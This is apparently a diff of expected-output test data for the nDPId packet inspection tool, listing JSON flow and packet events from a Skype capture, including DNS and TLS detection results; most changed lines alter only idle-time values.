-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2078,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1431969718289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969718289,"pkt":"0NQSxnP1PBXCt3IOCABFAABAEiZAAEAG6EDAqAEiUA4uecPPET\/DDsi2AAAAALAC\/\/+lsQAAAgQFtAEDAwUBAQgKPiOyAgAAAAAEAgAA"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2084,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1431969718386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969718386,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoSFAAHQGJUVQDi55wKgBIhE\/w88Zt5eOww7It7AS\/\/\/jjAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2085,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1431969718386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969718386,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PHJAAEAGvgDAqAEiUA4uecPPET\/DDsi3GbeXj4AQECwjnwAAAQEICj4jsmEAAAAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2055,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717949,"flow_last_seen":1431969717949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717949,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2055,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1431969717949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717949,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1MFAAEAGbfDAqAEiW77afcPNMD7mkcxwAAAAALAC\/\/+pEQAAAgQFtAEDAwUBAQgKPiOwswAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717949,"flow_last_seen":1431969717949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969717949,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1431969717949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969717949,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjMJAAEAGuFXAqAEiW77YF8POMD6CImXAAAAAALAC\/\/92lQAAAgQFtAEDAwUBAQgKPiOwtAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1431969717992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969717992,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGUBRbvtgXwKgBIjA+w86t1YyggiJlwaASOJDgygAAAgQFrAQCCAoNJSaXPiOwtAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1431969717992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ynpAAEAGeqnAqAEiW77YF8POMD6CImXBrdWMoYAQECw3ygAAAQEICj4jsN8NJSaX"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2062,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431969718010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969718010,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0kN5AAPQG\/d5bvtp9wKgBIjA+w83ZQ\/6U5pHMcYASH\/7YKwAAAgQFoAEDAwQBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2063,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1431969718010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969718010,"pkt":"0NQSxnP1PBXCt3IOCABFAAAonhdAAEAGpLLAqAEiW77afcPNMD7mkcxx2UP+lVAQIAAY5QAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2078,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969718289,"flow_last_seen":1431969718289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969718289,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2078,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1431969718289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969718289,"pkt":"0NQSxnP1PBXCt3IOCABFAABAEiZAAEAG6EDAqAEiUA4uecPPET\/DDsi2AAAAALAC\/\/+lsQAAAgQFtAEDAwUBAQgKPiOyAgAAAAAEAgAA"} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2084,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1431969718386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969718386,"pkt":"PBXCt3IO0NQSxnP1CABFAABAoSFAAHQGJUVQDi55wKgBIhE\/w88Zt5eOww7It7AS\/\/\/jjAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2085,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1431969718386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969718386,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PHJAAEAGvgDAqAEiUA4uecPPET\/DDsi3GbeXj4AQECwjnwAAAQEICj4jsmEAAAAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2112,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1431969718838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969718838,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuya0AAEARB4bAqAEisBo3pzLd+R0AGsL+nm0CcwIwd+MhD2imQikN7XJ0"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2113,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431969718838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969718838,"pkt":"0NQSxnP1PBXCt3IOCABFAAAupZYAAEAR95jAqAEiTLnPDDLdsbUAGqRNnm8CZa4cvOCl2walp\/2oMJDI"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -933,23 +933,23 @@ 00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431969719110,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1431969719110,"pkt":"PBXCt3IO0NQSxnP1CABFAAB3AABAAEARtwLAqAEBwKgBIgA18\/YAY7LlbrSBgAABAAIAAAAAE3AwNS1rZXl2YWx1ZXNlcnZpY2UGaWNsb3VkA2NvbQZha2FkbnMDbmV0AAABAAHADAABAAEAAAAZAAQRrGQkwAwAAQABAAAAGQAEEaxkCA=="} 00816{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2127,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969719055,"flow_last_seen":1431969719110,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"p05-keyvalueservice.icloud.com.akadns.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.172.100.36"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719110,"flow_last_seen":1431969719110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431969719110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719110,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHqNAAEAG5HrAqAEiEaxkJMPQAbsLGQpgAAAAALAC\/\/8xEQAAAgQFtAEDAwUBAQgKPiO1KQAAAAAEAgAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431969719259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1431969719259,"pkt":"PBXCt3IO0NQSxnP1CABFAAAsDItAAPAGRqYRrGQkwKgBIgG7w9AFbnZwCxkKYWASH\/7prQAAAgQFoAAA"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431969719259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719259,"pkt":"0NQSxnP1PBXCt3IOCABFAAAocytAAEAGkArAqAEiEaxkJMPQAbsLGQphBW52cVAQ\/\/8hVQAA"} -00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719561,"flow_last_seen":1431969719561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719561,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431969719561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719561,"pkt":"0NQSxnP1PBXCt3IOCABFAABAR+5AAEAG+sPAqAEiW77afcPRMD4OYtZAAAAAALAC\/\/9xPAAAAgQFtAEDAwUBAQgKPiO25AAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2177,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431969719623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969719623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0Hj5AAPQGcH9bvtp9wKgBIjA+w9E3PWT9DmLWQYASH\/7iJQAAAgQFoAEDAwQBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431969719623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719623,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo4VtAAEAGYW7AqAEiW77afcPRMD4OYtZBNz1k\/lAQIAAi3wAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719110,"flow_last_seen":1431969719110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719110,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2128,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431969719110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719110,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHqNAAEAG5HrAqAEiEaxkJMPQAbsLGQpgAAAAALAC\/\/8xEQAAAgQFtAEDAwUBAQgKPiO1KQAAAAAEAgAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2138,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431969719259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1431969719259,"pkt":"PBXCt3IO0NQSxnP1CABFAAAsDItAAPAGRqYRrGQkwKgBIgG7w9AFbnZwCxkKYWASH\/7prQAAAgQFoAAA"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2139,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431969719259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719259,"pkt":"0NQSxnP1PBXCt3IOCABFAAAocytAAEAGkArAqAEiEaxkJMPQAbsLGQphBW52cVAQ\/\/8hVQAA"} +00982{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2140,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969719110,"flow_last_seen":1431969719260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1431969719260,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2145,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969719110,"flow_last_seen":1431969719411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":325,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1431969719411,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p05-keyvalueservice.icloud.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719561,"flow_last_seen":1431969719561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969719561,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431969719561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969719561,"pkt":"0NQSxnP1PBXCt3IOCABFAABAR+5AAEAG+sPAqAEiW77afcPRMD4OYtZAAAAAALAC\/\/9xPAAAAgQFtAEDAwUBAQgKPiO25AAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2177,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431969719623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969719623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0Hj5AAPQGcH9bvtp9wKgBIjA+w9E3PWT9DmLWQYASH\/7iJQAAAgQFoAEDAwQBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2180,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431969719623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969719623,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo4VtAAEAGYW7AqAEiW77afcPRMD4OYtZBNz1k\/lAQIAAi3wAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABKnloAAEARWNXAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 